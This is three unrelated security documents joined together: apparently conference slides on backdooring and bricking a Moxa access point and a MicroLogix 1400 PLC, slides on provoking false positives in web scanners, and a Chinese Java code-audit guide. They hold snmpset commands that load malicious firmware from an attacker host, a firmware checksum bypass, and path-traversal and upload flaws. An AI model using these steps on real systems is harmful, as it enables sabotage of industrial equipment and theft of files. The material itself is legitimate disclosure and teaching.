addgroup&&&&&&&&&&&&&&&date&&&&&&&&&&&&&&&&&&&fsync&&&&&&&&&&&&&&&&&&iperf&&&&&&&&&&&&&&&&&&iw_waitSetup&&&&&&&&&&&mknod&&&&&&&&&&&&&&&&&&readlink&&&&&&&&&&&&&&&sv&&&&&&&&&&&&&&&&&&&&&vi& adduser&&&&&&&&&&&&&&&&dd&&&&&&&&&&&&&&&&&&&&&fuser&&&&&&&&&&&&&&&&&&iplink&&&&&&&&&&&&&&&&&iw_webs&&&&&&&&&&&&&&&&mkpasswd&&&&&&&&&&&&&&&readprofile&&&&&&&&&&&&svlogd&&&&&&&&&&&&&&&&&virtual_op& adjtimex&&&&&&&&&&&&&&&delgroup&&&&&&&&&&&&&&&fw_printenv&&&&&&&&&&&&iproute&&&&&&&&&&&&&&&&iw_xmodemTest&&&&&&&&&&mktemp&&&&&&&&&&&&&&&&&realpath&&&&&&&&&&&&&&&sync&&&&&&&&&&&&&&&&&&&vlock& apstats&&&&&&&&&&&&&&&&deluser&&&&&&&&&&&&&&&&fw_setenv&&&&&&&&&&&&&&iprule&&&&&&&&&&&&&&&&&iwconfig&&&&&&&&&&&&&&&modinfo&&&&&&&&&&&&&&&&reboot&&&&&&&&&&&&&&&&&sysctl&&&&&&&&&&&&&&&&&watch& arp&&&&&&&&&&&&&&&&&&&&depmod&&&&&&&&&&&&&&&&&getopt&&&&&&&&&&&&&&&&&iptables&&&&&&&&&&&&&&&iwevent&&&&&&&&&&&&&&&&modprobe&&&&&&&&&&&&&&&reg&&&&&&&&&&&&&&&&&&&&syslogd&&&&&&&&&&&&&&&&watchdog& arping&&&&&&&&&&&&&&&&&df&&&&&&&&&&&&&&&&&&&&&getty&&&&&&&&&&&&&&&&&&iptunnel&&&&&&&&&&&&&&&iwgetid&&&&&&&&&&&&&&&&mount&&&&&&&&&&&&&&&&&&renice&&&&&&&&&&&&&&&&&tail&&&&&&&&&&&&&&&&&&&wc& ash&&&&&&&&&&&&&&&&&&&&dhcprelay&&&&&&&&&&&&&&getvalue&&&&&&&&&&&&&&&iw_CAFile_update&&&&&&&iwlist&&&&&&&&&&&&&&&&&mox_get_vid&&&&&&&&&&&&reset&&&&&&&&&&&&&&&&&&tar&&&&&&&&&&&&&&&&&&&&wget& athdebug&&&&&&&&&&&&&&&diff&&&&&&&&&&&&&&&&&&&grep&&&&&&&&&&&&&&&&&&&iw_console&&&&&&&&&&&&&iwpriv&&&&&&&&&&&&&&&&&mox_vconfig&&&&&&&&&&&&resize&&&&&&&&&&&&&&&&&tcpdump&&&&&&&&&&&&&&&&wget.sh& athstats&&&&&&&&&&&&&&&dirname&&&&&&&&&&&&&&&&groups&&&&&&&&&&&&&&&&&iw_console_user&&&&&&&&iwspy&&&&&&&&&&&&&&&&&&mpstat&&&&&&&&&&&&&&&&&rm&&&&&&&&&&&&&&&&&&&&&tcpsvd&&&&&&&&&&&&&&&&&which& athstatsclr&&&&&&&&&&&&dmesg&&&&&&&&&&&&&&&&&&gunzip&&&&&&&&&&&&&&&&&iw_diagnose&&&&&&&&&&&&kill&&&&&&&&&&&&&&&&&&&mv&&&&&&&&&&&&&&&&&&&&&rmdir&&&&&&&&&&&&&&&&&&telnet&&&&&&&&&&&&&&&&&who& awk&&&&&&&&&&&&&&&&&&&&dnsdomainname&&&&&&&&&&gzip&&&&&&&&&&&&&&&&&&&iw_doConfig&&&&&&&&&&&&killall&&&&&&&&&&&&&&&&nart.out&&&&&&&&&&&&&&&rmmod&&&&&&&&&&&&&&&&&&telnetd&&&&&&&&&&&&&&&&whoami& basename&&&&&&&&&&&&&&&dnsmasq&&&&&&&&&&&&&&&&halt&&&&&&&&&&&&&&&&&&&iw_dst&&&&&&&&&&&&&&&&&killall5&&&&&&&&&&&&&&&netstat&&&&&&&&&&&&&&&&route&&&&&&&&&&&&&&&&&&test&&&&&&&&&&&&&&&&&&&whois& beep&&&&&&&&&&&&&&&&&&&dropbear&&&&&&&&&&&&&&&hd&&&&&&&&&&&&&&&&&&&&&iw_event&&&&&&&&&&&&&&&klogd&&&&&&&&&&&&&&&&&&nice&&&&&&&&&&&&&&&&&&&rpcapd&&&&&&&&&&&&&&&&&test_get_eapol_key&&&&&wifi_setup& blockdev&&&&&&&&&&&&&&&dropbearkey&&&&&&&&&&&&head&&&&&&&&&&&&&&&&&&&iw_event_user&&&&&&&&&&konf&&&&&&&&&&&&&&&&&&&nmeter&&&&&&&&&&&&&&&&&rtcwake&&&&&&&&&&&&&&&&test_get_node_list&&&&&wifi_test& bootchartd&&&&&&&&&&&&&du&&&&&&&&&&&&&&&&&&&&&hexdump&&&&&&&&&&&&&&&&iw_firewall&&&&&&&&&&&&konfd&&&&&&&&&&&&&&&&&&nohup&&&&&&&&&&&&&&&&&&run-parts&&&&&&&&&&&&&&test_get_rssi_report&&&wirelessWatchdog& brctl&&&&&&&&&&&&&&&&&&dumpleases&&&&&&&&&&&&&hostapd&&&&&&&&&&&&&&&&iw_fw&&&&&&&&&&&&&&&&&&lan_setup&&&&&&&&&&&&&&nslookup&&&&&&&&&&&&&&&runlevel&&&&&&&&&&&&&&&tftp&&&&&&&&&&&&&&&&&&&wlanconfig& burnin_9344&&&&&&&&&&&&dumpregs&&&&&&&&&&&&&&&hostapd_cli&&&&&&&&&&&&iw_gps&&&&&&&&&&&&&&&&&lan_test&&&&&&&&&&&&&&&openssl&&&&&&&&&&&&&&&&runsv&&&&&&&&&&&&&&&&&&time&&&&&&&&&&&&&&&&&&&wpa_cli& busybox&&&&&&&&&&&&&&&&ebtables&&&&&&&&&&&&&&&hostname&&&&&&&&&&&&&&&iw_handle_phy&&&&&&&&&&less&&&&&&&&&&&&&&&&&&&passwd&&&&&&&&&&&&&&&&&runsvdir&&&&&&&&&&&&&&&timeout&&&&&&&&&&&&&&&&wpa_passphrase& cat&&&&&&&&&&&&&&&&&&&&ebtables-restore&&&&&&&hwclock&&&&&&&&&&&&&&&&iw_init&&&&&&&&&&&&&&&&lldpctl&&&&&&&&&&&&&&&&pgrep&&&&&&&&&&&&&&&&&&sed&&&&&&&&&&&&&&&&&&&&top&&&&&&&&&&&&&&&&&&&&wpa_supplicant& chgrp&&&&&&&&&&&&&&&&&&echo&&&&&&&&&&&&&&&&&&&i2cdetect&&&&&&&&&&&&&&iw_ipConflict&&&&&&&&&&lldpd&&&&&&&&&&&&&&&&&&pidof&&&&&&&&&&&&&&&&&&seq&&&&&&&&&&&&&&&&&&&&touch&&&&&&&&&&&&&&&&&&xargs& chmod&&&&&&&&&&&&&&&&&&eeprom&&&&&&&&&&&&&&&&&i2cdump&&&&&&&&&&&&&&&&iw_ip_update&&&&&&&&&&&ln&&&&&&&&&&&&&&&&&&&&&ping&&&&&&&&&&&&&&&&&&&serviceAgent&&&&&&&&&&&tr&&&&&&&&&&&&&&&&&&&&&yes& chown&&&&&&&&&&&&&&&&&&egrep&&&&&&&&&&&&&&&&&&i2cget&&&&&&&&&&&&&&&&&iw_ntp&&&&&&&&&&&&&&&&&log&&&&&&&&&&&&&&&&&&&&pipe_progress&&&&&&&&&&setconsole&&&&&&&&&&&&&traceroute&&&&&&&&&&&&&zcat& chpasswd&&&&&&&&&&&&&&&emiHandler&&&&&&&&&&&&&i2cset&&&&&&&&&&&&&&&&&iw_onekey&&&&&&&&&&&&&&logHandler&&&&&&&&&&&&&pkill&&&&&&&&&&&&&&&&&&setlogcons&&&&&&&&&&&&&true&&&&&&&&&&&&&&&&&&&zcip& chpst&&&&&&&&&&&&&&&&&&env&&&&&&&&&&&&&&&&&&&&id&&&&&&&&&&&&&&&&&&&&&iw_ramImage&&&&&&&&&&&&logger&&&&&&&&&&&&&&&&&pktlogconf&&&&&&&&&&&&&setserial&&&&&&&&&&&&&&tty&&&&&&&&&&&&&&&&&&&&zip_main& chroot&&&&&&&&&&&&&&&&&envdir&&&&&&&&&&&&&&&&&ifconfig&&&&&&&&&&&&&&&iw_resetd&&&&&&&&&&&&&&login&&&&&&&&&&&&&&&&&&pktlogdump&&&&&&&&&&&&&setsid&&&&&&&&&&&&&&&&&ttysize& chrt&&&&&&&&&&&&&&&&&&&envuidgid&&&&&&&&&&&&&&ifdown&&&&&&&&&&&&&&&&&iw_setBios&&&&&&&&&&&&&logname&&&&&&&&&&&&&&&&pmap&&&&&&&&&&&&&&&&&&&setuidgid&&&&&&&&&&&&&&tunctl& cksum&&&&&&&&&&&&&&&&&&ethreg&&&&&&&&&&&&&&&&&ifrename&&&&&&&&&&&&&&&iw_setValue&&&&&&&&&&&&logread&&&&&&&&&&&&&&&&poweroff&&&&&&&&&&&&&&&sh&&&&&&&&&&&&&&&&&&&&&udhcpc& clear&&&&&&&&&&&&&&&&&&event_logd&&&&&&&&&&&&&ifup&&&&&&&&&&&&&&&&&&&iw_snmpd&&&&&&&&&&&&&&&losetup&&&&&&&&&&&&&&&&printenv&&&&&&&&&&&&&&&slattach&&&&&&&&&&&&&&&udhcpd& clish&&&&&&&&&&&&&&&&&&expand&&&&&&&&&&&&&&&&&init&&&&&&&&&&&&&&&&&&&iw_sysMon&&&&&&&&&&&&&&ls&&&&&&&&&&&&&&&&&&&&&printf&&&&&&&&&&&&&&&&&sleep&&&&&&&&&&&&&&&&&&umount& comm&&&&&&&&&&&&&&&&&&&expr&&&&&&&&&&&&&&&&&&&insmod&&&&&&&&&&&&&&&&&iw_test&&&&&&&&&&&&&&&&lsmod&&&&&&&&&&&&&&&&&&ps&&&&&&&&&&&&&&&&&&&&&snmpd&&&&&&&&&&&&&&&&&&uname& cp&&&&&&&&&&&&&&&&&&&&&false&&&&&&&&&&&&&&&&&&io&&&&&&&&&&&&&&&&&&&&&iw_testBoard&&&&&&&&&&&lsusb&&&&&&&&&&&&&&&&&&pstree&&&&&&&&&&&&&&&&&softlimit&&&&&&&&&&&&&&unexpand& crond&&&&&&&&&&&&&&&&&&fgrep&&&&&&&&&&&&&&&&&&iostat&&&&&&&&&&&&&&&&&iw_testDesc&&&&&&&&&&&&md5sum&&&&&&&&&&&&&&&&&pwd&&&&&&&&&&&&&&&&&&&&sort&& MOXA WAP: NOW WHAT? •  Modify legit binaries –  change the serviceAgent binary to deliver custom payloads to the Moxa Windows configuration application •  this potentially allows an attacker to “swim upstream”, moving from the device up to the IT network •  get around read-only: kill legit process and re-run new from /var –  “patch” the firmware install binary to skip integrity checks •  iptables, tunnels, catch all traffic, etc. •  Linux kernel modules –  insmod, lsmod, rmmod •  Change RF parameters –  frequency, channel, strength, etc. MOXA WAP: NOW WHAT? MOXA WAP: SOFT BRICK •  killall5 –  send a signal to all processes –  device requires manual hard power cycle •  reset button doesn’t work •  umount / mount games MOXA WAP: FIRM BRICK •  Not sure how it happened J •  Was testing out a bunch of Moxa binaries –  suspect it was fw_setenv followed by a couple mount/umount and a reboot •  the device never came back from the reboot –  have full console logs but haven’t been able to verify •  so far unable to un-brick the device •  only have 1 functional device remaining MOXA WAP: FIRM BRICK /&#&fw_setenv&-a& Unlocking&flash...& Done& Erasing&old&environment...& Done& Writing&environment&to&/dev/mtd1...& Done& Locking&...& Done& /&#&mount&-o&remount,rw&–a& /&#&reboot& & MOXA WAP: FIRM BRICK MOXA AWK-3131A: CVEs 1.  CVE-2016-8717 10.0 Hard-coded Administrator Credentials Vulnerability 2.  CVE-2016-8721 9.1 Web Application Ping Command Injection Vulnerability 3.  CVE-2016-8723 7.5 HTTP GET Denial of Service Vulnerability 4.  CVE-2016-8716 7.5 Web Application Cleartext Transmission of Password Vulnerability 5.  CVE-2016-8718 7.5 Web Application Cross-Site Request Forgery Vulnerability 6.  CVE-2016-8719 7.5 Web Application Multiple Reflected Cross-Site Scripting Vulnerabilities 7.  CVE-2016-8712 5.9 Web Application Nonce Reuse Vulnerability 8.  CVE-2016-8722 5.3 Web Application asqc.asp Information Disclosure Vulnerability 9.  CVE-2016-8720 3.1 Web Application bkpath HTTP Header Injection Vulnerability 10.  CVE-2016-0241 7.5 Web Application onekey Information Disclosure Vulnerability 11.  CVE-2016-8725 5.3 Web Application systemlog.log Information Disclosure Vulnerability 12.  CVE-2016-8724 5.3 serviceAgent Information Disclosure Vulnerability 13.  CVE-2016-8726 7.5 web_runScript Header Manipulation Denial of Service Vulnerability MOXA AWK-3131A: HELLO AB MICROLOGIX 1400 PLC ML1400: ABOUT •  Programmable Logic Controller (PLC) –  “micro” and “nano” control systems •  as opposed to “small” or “large” control systems –  “conveyor automation, security systems, and building and parking lot lighting.” •  Built in –  Input / Output –  Ethernet –  Serial –  Expansion I/O ML1400: ABOUT ML1400: FIRMWARE •  binwalk not much help •  strings not much help •  limited analysis tools ML1400: FIRMWARE - STRINGS ML1400: FIRMWARE - BINWALK ML1400: FIRMWARE - BINWALK binwalk&–A&<firmware>& ML1400: FIRMWARE - BINWALK ML1400: HARDWARE ML1400: HARDWARE ML1400: SNMP ML1400: SNMP snmpwalk&-v&2c&-c&public&192.168.42.11& ML1400: SNMP BACKDOOR snmpwalk&-c&public&-v&2c&192.168.42.11&.1.3.6.1.4.1.95& ML1400: SNMP BACKDOOR CVE-2016-5645 AB Rockwell Automation MicroLogix 1400 Code Execution Vulnerability ML1400: SNMP BACKDOOR ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE & ~#&snmpset&-c&wheel&-v&2c&192.168.42.11&. 1.3.6.1.4.1.95.2.2.1.1.1.0&a&<attacker_IP>& & ~#&snmpset&-c&wheel&-v&2c&192.168.42.11&. 1.3.6.1.4.1.95.2.2.1.1.2.0&s&"<evil_firmware>”& & ~#&snmpset&-c&wheel&-v&2c&192.168.42.11&. 1.3.6.1.4.1.95.2.3.1.1.1.1.0&i&2& ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE ML1400: BYPASS INTEGRITY CHECK •  Only using self-reported checksum* –  Basic math –  At least two very easy bypasses 1.  Find all occurrences of checksums in the firmware and update to match modified firmware 2.  Make “compensating” changes when modifying firmware –  “zero sum” byte changes »  0x12&0x34&à&0x34&0x12& »  0x42&0x42&à&0x41&0x43& »  0x00&0x00&0x00&0xFF&à&0x41&0x42&0x43&0x39& •  * Rockwell claims that the newest hardware (Series C) uses cryptographically-signed firmware •  Not supported on older models •  Challenge accepted J ML1400: BYPASS INTEGRITY CHECK ML1400: BYPASS INTEGRITY CHECK ML1400: BYPASS INTEGRITY CHECK ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE •  web header ML1400: MODIFY FIRMWARE •  web change ML1400: MODIFY FIRMWARE ML1400: SOFT BRICK 4EF9&0004&0150& &JMP&0x00040150&& & JMP&to&start&of&code& &0x150&bytes&in& &offset&0x40000& ML1400: SOFT BRICK 4EF9&0004&0000& &JMP&0x00040000&& & JMP&to&self& ML1400: SOFT BRICK ML1400: SOFT BRICK Reboot (Try TFTP Firmware) (Try Flash Firmware) ML1400: SOFT BRICK ML1400: FIRM BRICK •  Unsuccessful with a few dozen “elegant” attacks –  creative changes of MIPS instructions –  jump loops –  math •  Success on first attempt of “hey, look over there” attack –  randomly move bytes* around *bytes that are important but are not MIPS instructions ML1400: FIRM BRICK ML1400: FIRM BRICK ML1400: FIRM BRICK ML1400: FIRM BRICK ML1400: FIRM BRICK ML1400: HARD BRICK ML1400: HARD BRICK CONCLUSION tl;dr •  From Box to Backdoor to Brick THANK YOU •  Cisco Talos •  Moxa Americas •  Rockwell Automation / Allen-Bradley QUESTIONS? Patrick DeSantis @pat_r10t talosintelligence.com @talossecurity BACKUP SLIDES IP CAMERA? VENDOR DISCLOSURE
pdf
Hacking the EULA: Reverse Benchmarking Web Application Security Scanners Each year thousands of work hours are lost by security practitioners sorting through web application security reports separating out erroneous vulnerability data. Individuals must currently work through this process in a vacuum, as there is little to no publicly available information that is helpful. Compounding this situation, restrictive vendor EULAs (End User License Agreements) prohibit publishing of research about the quality of their signature base. Due to these agreements, a chilling effect has discouraged public research into the common types of false positives that existing commercial web application scanner technologies are prone to exhibit. Overview Tom Stracener, Sr. Security Analyst, Cenzic Inc. Marce Luck, Information Security Architect, Fortune 100 company About the speakers… Introduction Web Application Security Scanning Technology The Problem of False Positives What is Reverse Benchmarking? Reverse Benchmarking Methodology 10 Common False Positive Types Further Research Business as usual… B) You shall not: (i) use the Software or any portion thereof except as provided in this Agreement; (ii) modify, create derivative works of, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction) or attempt to derive the Source Code of the Software provided to You in machine executable object code form; (iii) market, distribute or otherwise transfer copies of the Software to others; (iv) rent, lease or loan the Software; (v) distribute externally or to any third party any communication that compares the features, functions or performance characteristics of the Software with any other product of You or any third party; or (vi) attempt to modify or tamper with the normal function of a license manager that regulates usage of the Software. What is Reverse Benchmarking? Proactive Security Whoever is first in the field and awaits the coming of the enemy, will be fresh for the fight; whoever is second in the field and has to hasten to battle will arrive exhausted. -- Sun-Tzu “The Art of War” Analyzing Application Security Scanners • Security Assessment ‘quality’ criteria – Functionality (Black vs White Box) – Ergonomics & Usability – Performance – Feature Sets – Bling – Accuracy – False Positive Rates i.e. Signal to Noise Analyzing Application Security Scanners • Benchmarking Concepts – Benchmarking black box scanners is ultimately a systematic comparison – Most common Benchmarking technique is ‘positive’ or ‘comparative’ benchmarking – The goal is to see which scanner does the best against a selected application Positive and Negative Accuracy concepts + Benchmarking: Accuracy Positive Benchmarking is a measure of the number of valid results relative to the total number of vulnerabilities in the application. • Example: Scanner Foodizzle found 8 out of 10 vulnerabilities in the target application, i.e. it was 80% relative to the vulnerability-set. • Use: Measures of ‘accuracy’ are commonly used during positive benchmarking, bake-offs, etc. • Challenges: Accuracy is difficult to measure because its often difficult to know exactly how many vulnerabilities there are in the target application. + Benchmarking Limitations Positive Benchmarking relies on objective knowledge of vulnerabilities in the target application, and thus breaks down when not performed by experts • Selection Bias: Scanner Foodizzle found 8 out of 10 vulnerabilities in the target application, i.e. it was 80% relative to the vulnerability-set. • Interpreting the Data: Measures of ‘accuracy’ are commonly used during positive benchmarking, bake-offs, etc. • Tuning Against the App: Accuracy is difficult to measure because its often difficult to know exactly how many vulnerabilities there are in the target application. • Analysis Gaps: typical bake-off or benchmarking methods do not rigorously test important scanner characteristics like the spider, because the spider is only indirectly related to accuracy + Benchmarking Limitations Positive Benchmarking relies on objective knowledge of vulnerabilities in the target application, and thus breaks down when not performed by experts • Tuning Against the App: Its not uncommon for vendors to download the well-known sample applications and ‘tune’ their technology to detect most or all of the security issues. Reverse Benchmarking enlarges the eye of the EULA needle… What is Reverse Benchmarking? • It’s a type of passive Reverse Engineering. • Its Designed to Kick a Scanner’s AssTM • Causes Massive False Positives • Facilitates an understanding vulnerability detection methods • Think of it as Detection Logic Fuzzing Exposes poor coding, faulty detection logic Reveals Security Testing design flaws Confuses Stateless Testing Mechanisms Rationale for Reverse Benchmarking Most of the Common False Positive Types have been around since 1999-2000 Most testing mechanisms are entirely stateless and have evolved little Very little is known about False Positives, as a science There are no taxonomies or Top 10 lists for Common False Positive Types Reverse Benchmark Target Web Application Scanner Enumerates and Categorizes False Positive Types Reveals Vacuous or Meaningless results Reveals Semantic flaws in vulnerability Categorization Reveals systemic flaws in application spider technology Web Application Security Scanners Key Trends 2000-2007 GUI’s have gotten prettier but the underlying technology hasn’t changed much since 2000. Many technologies are still using stateless stimulus-response mechanisms for most security tests (XSS is becoming the exception to this rule). False Positives related to the detection of SQL injection and Blind SQL Injection are rampant. Mechanics of file scanning is still largely based on Whisker-Nikto, and prone to false positives AJAX and Web Services support has increased the numbers of false positives, due to re-use of legacy security testing procedures. Signal-to-Noise Ratio is still very bad, with False Positives exceeding useful results usually by 2:1, and this is a conservative figure. Most application spiders do poorly against javascript and flash, and some technologies cannot automatically navigate Form-based logins. Semantic problems with security tests are widespread, i.e. mislabeled vulnerabilities, ambiguous vulnerabilities, meaningless results. Each year the problem gets worse, and acquisitions may further set back innovation. The Problem of False Positives (A scanner darkly) Common False Positive Types are not Easily Studied… B) You shall not: (i) use the Software or any portion thereof except as provided in this Agreement; (ii) modify, create derivative works of, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction) or attempt to derive the Source Code of the Software provided to You in machine executable object code form; (iii) market, distribute or otherwise transfer copies of the Software to others; (iv) rent, lease or loan the Software; (v) distribute externally or to any third party any communication that compares the features, functions or performance characteristics of the Software with any other product of You or any third party; or (vi) attempt to modify or tamper with the normal function of a license manager that regulates usage of the Software. Most EULAs prevent a comparison between technologies Reverse Benchmarking Methodology Active False Positive Solicitation and Reverse Fault Injection via a sample web application. A reverse benchmarking target can be used to model a production application, thereby decreasing the semantic gap between triggered false positives and false positives found within the production environment Reverse Benchmarking Goals The goal of Reverse Benchmarking is not to malign vendors, but to aid the security community and help developers avoid the same mistakes with each new generation of technology Systematically performed, Reverse Benchmarking can help security practioners learn to quickly distinguish false positives from valid security issues, as they will learn the conditions under which the technology they are using fails. Based on the type of trigger that elicits the false positive, a taxonomy of false positive types can be developed. A set of common causes or contributing factors for each type can be outlined. Partial Match Problems Detection strings may be a subset of existing content and triggered by the presence of unrelated words or elements within the HTML or DOM GET /search.pl~bak July 2007 200 OK Common Causes of False Positives Parameter Echoing Parameter values may be echoed back in places within a web application, and this can trigger false positives. <TEXTAREA rows=3 ls=100> • <?php • // get the form data • $field1 = $_POST['comments']; • // Echo the value of the comments parameter • echo "Backacha Biatch: $field1"; • ?> • </TEXTAREA> Mistaken Identity Some security tests look for vulnerability conditions so general that the vulnerability reported must be disambiguated in order to be verified. Many types of PHP forum software, Calendars, Blogs reuse a common code base and so overlapping URI and application responses GET /search.pl Alibaba Search Overflow Paul’s Search SQL InjXn YABB Search.pl XSS Semantic Ambiguity Signature-based detection is often relies on signatures that are generic and thus are neither necessary nor sufficient for the vulnerability to be present. [Microsoft][ODBC SQL Server Driver] Many false positives arise because the vulnerability is more complex than the vulnerability conditions checked for by the signatures. Response Timing Slow, unresponsive, or delayed server-side processing can trigger security checks that are timing dependent Some SQL injection tests use a wait_for_delay expression and measure the timing. Custom 404 Pages Simple file scanning routines and other security tests will trigger erroneously in the presence of custom 404 pages. Some signatures are based on 302 Redirects GET /search.pl~bak 302 200 Custom 404 Pages Simple file scanning routines and other security tests will trigger erroneously in the presence of custom 404 pages. Some signatures are based on 302 Redirects GET /search.pl~bak 302 200 Creating a Reverse Benchmark target Nature of the target will depend on your goals as a researcher Reverse Engineering 1. Emphasis on exposing as much of the signature base and rule set as possible without inspecting datafiles or code. Clear generic cases that will likely impact the largest portion of the rule base 2. Focus on generic trigger signatures, including available open source scanners. (i.e. use of Nikto detections strings in response data. Creating a Reverse Benchmark target Nature of the target will depend on your goals as a researcher Bakeoffs/Comparisons 1. Emphasis on exposing false positives or signature flaws of all varieties, including the uncommon or essoteric. Use of non- standard or overly difficult application configuration to stress test the scanner. 2. Focus on unusual or non-standard trigger signatures. i.e. Javascript or Flash road test Creating a Reverse Benchmark target Nature of the target will depend on your goals as a researcher Reverse Engineering 1. Emphasis on exposing as much of the signature base and rule set as possible without inspecting datafiles or code. 2. Focus on generic trigger signatures Open Reverse Benchmarking Project Nature of the target will depend on your goals as a researcher 1. Emphasis on exposing as much of the signature base and rule set as possible without inspecting datafiles or code. 2. Focus on generic trigger signatures Backatcha Roadtest Results Took 4 popular blackbox web application security scanners Ran their default policies against the target reverse benchmarking application Put the results into high level buckets Generated a few graphs with the results Total False Positives 92% 2% 2% 4% Scanner 1 Scanner 2 Scanner 3 Scanner 4 Scanner 1 False Positives 42% 5% 2% 7% 30% 14% 0% Path Manipulation Command Injection XSS SQL Injection File Disclosure Known Vulnerabilities Misconfigurations Scanner 2 False Positives 29% 11% 4% 21% 21% 0% 14% Path Manipulation Command Injection XSS SQL Injection File Disclosure Known Vulnerabilities Misconfigurations Scanner 3 False Positives 0% 29% 67% 2% 1% 0% 1% Path Manipulation Command Injection XSS SQL Injection File Disclosure Known Vulnerabilities Misconfigurations Scanner 4 False Positives 4% 0% 53% 0% 7% 0% 36% Path Manipulation Command Injection XSS SQL Injection File Disclosure Known Vulnerabilities Misconfigurations Conclusions All Scanners had simple problems One scanner did really badly Further Research is needed Community support is needed Examples of false positives Further Research Improve reverse benchmarking target Add more tests Improve testing methodology Test with more scanners Partner with OWASP Help develop Reverse Benchmarking Module for SiteGenerator
pdf
Java 代码审计常用漏洞总结 1.1 审计方法总结 主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑 可以是一个函数,或者是条小小的条件判断语句。 敏感函数参数回溯,根据敏感函数,逆向追踪参数传递的过程。这个方法是最高效,最常用 的方法。大多数漏洞的产生是因为函数的使用不当导致的,只要找到这些函数,就能够快速 挖掘想要的漏洞。 以下是基于关键词审计技巧总结: 在搜索时要注意是否为整个单词,以及小写敏感这些设置 漏洞名称 关键词 密码硬编码、密码明文存储 password 、pass、jdbc XSS getParamter、<%=、param. SQL 注入 Select、Dao 、from 、delete 、update、insert 任意文件下载 download 、fileName 、filePath、write、getFile、getWriter 任意文件删除 Delete、deleteFile、fileName 、filePath 文件上传 Upload、write、fileName 、filePath 命令注入 getRuntime、exec、cmd、shell 缓冲区溢出 strcpy,strcat,scanf,memcpy,memmove,memeccpy Getc(),fgetc(),getchar;read,printf XML 注入 DocumentBuilder、XMLStreamReader、SAXBuilder、SAXParser SAXReader 、XMLReader SAXSource 、TransformerFactory 、SAXTransformerFactory 、 SchemaFactory 反序列化漏洞 ObjectInputStream.readObject 、ObjectInputStream.readUnshared、XMLDecoder.readObject Yaml.load 、 XStream.fromXML 、 ObjectMapper.readValue 、 JSON.parseObject url 跳转 sendRedirect、setHeader、forward 不安全组件暴露 activity、Broadcast Receiver、Content Provider、Service、 inter-filter 日志记录敏感信息 log log.info logger.info 代码执行 eval、system、exec 2.1 可基于关键词审计的漏洞 2.1.1 密码硬编码 审计方法 密码硬编码最容易找,直接用 Sublime Text 打开项目目录,然后按 Ctrl + Shift + F 进行全局 搜索 password 关键词: 2.1.2 反射型 XSS 审计方法:反射型 XSS 一般 fortify 一般都能扫描出来 如果是手工找,可全局搜索以下关键词 getParamter <%= param. 漏洞代码示例: 1. EL 表达式输出请求参数: 代码在 170 行和 305 行处获取请求参数中的 groupId 值,在未经检查参数合法性的情况 下输出在 JavaScript 代码中,存在反射型 XSS 漏洞。 2. 输出 getParamter 获取的参数 然后在 224 行打印到如下的 js 代码中: 2.1.3 存储型 XSS 审计方法:方法有主要有两种: 1. 全局搜索数据库的插入语句(关键词:insert,save,update),然后找到该插入语句所属的方 法名如(insertUser()),然后全局搜索该方法在哪里被调用,一层层的跟踪。直到 getParamter()方法获取请求参数的地方停止,如果没有全局 XSS 过滤器,跟踪的整个流 程都没有对获取的参数过滤,则存在存储型 XSS。 2. 从 getParamter 关键词开始 ,跟踪请求参数,直到插入数据库的语句,如果中间没有过 滤参数,则存在存储型 XSS。 代码中 45 行和 46 行获取 usertype 和 name 的值,然后在 56 行存进数据库由于没有过 滤传进来的参数,所以会在显示时出来触发 XSS 2.1.4SQL 注入 审计方法: SQL 注入一般 fortify 一般都能扫描出来 手动找的话,一般直接搜索 select、update、delete、insert 关键词就会有收获 如果 sql 语句中有出现+ append、 $() # 等字眼,如果没有配置 SQL 过滤文件,则判断存 在 SQL 注入漏洞 当找到某个变量关键词有 SQL 注入漏洞时,还可以直接全局搜索那个关键词找出类似漏洞 的文件,上面中可以直接全局搜索 tableName 关键词: 要查找那个页面调用到含有漏洞的代码,就要跟踪方法的调用栈。以上面的注入点 tableName 为例: 双击打开该文件,然后查看该变量所在函数: 发现该函数对应的 URL 为/lookOverCubeFile ,对应的功能为查看模型任务生成的文件。 2.1.5 任意文件下载 审计方法:全局搜索以下关键词 fileName filePath getFile getWriter 漏洞示例: 代码在 downloadFile()函数中获取请求参数中的 affixalName 的值,然后赋值给 FileName 变量,接着在 196 行处通过拼接字符串赋值给 downPath 变量,然后在 198 行处调用 download 函数并把 downPath 的值传进函数,download 函数的代码如下: download 函数把 filePath 处的文件写到 http 响应中,在整个流程中并没有对文件名的合法 性进行检查,存在任意文件下载漏洞,如通过把 affixalName 的值设置 为../../../WEB-INF/web.xml 可以下载网站的 web.xml 文件。 2.1.6 任意文件删除 审计方法:任意文件删除漏洞搜索以下关键词可以找到: delete, deleteFile,fileName ,filePath 漏洞案例: 代码在 41 行获取 fileName 的值,在 44 行处调用 ds.deleteFile()函数删除文件,该函数的代 码如下: 在整个流程中并没有对文件名的合法性进行检查,存在任意文件删除漏洞,如通过把 fileName 的值设置为../WEB-INF/web.xml 可以删除网站的 web.xml 文件。 2.1.7 文件上传 审计方法: 文件上传可以搜索以下关键词:(需注意有没有配置文件上传白名单) upload,write,fileName ,filePath 在查看时,主要判断是否有检查后缀名,同时要查看配置文件是否有设置白名单或者黑名单, 像下面这种是检查了的: 下面的这种没检查: List<FileItem> fileItems = servletFileUpload.parseRequest(request); for (int i = 0; i < fileItems.size(); ++i) { FileItem fi = (FileItem) fileItems.get(i); String strFileName = fi.getName(); if (strFileName != null && !"".endsWith(strFileName)) { String fileName = opId + "_" + getTimeSequence() + "." + getFileNameExtension(strFileName); String diskFileName = path + fileName; File file = new File(diskFileName); if (file.exists()) { file.delete(); } fi.write(new File(diskFileName)); resultArrayNode.add(fileName); ...... private String getFileNameExtension(String fullFileName) { if (fullFileName == null) { return null; } int pos = fullFileName.lastIndexOf("."); if (pos != -1) { return fullFileName.substring(pos + 1, fullFileName.length()); } else { return null; } } 2.1.8 命令注入 审计方法:可以搜索以下关键词: getRuntime,exec,cmd,shell 在第 205 行中,通过拼接传过来的 ip 值来执行命令。如果 ip 值通过外部传入,则可以构造 以下的 ip 值来执行 net user 命令: 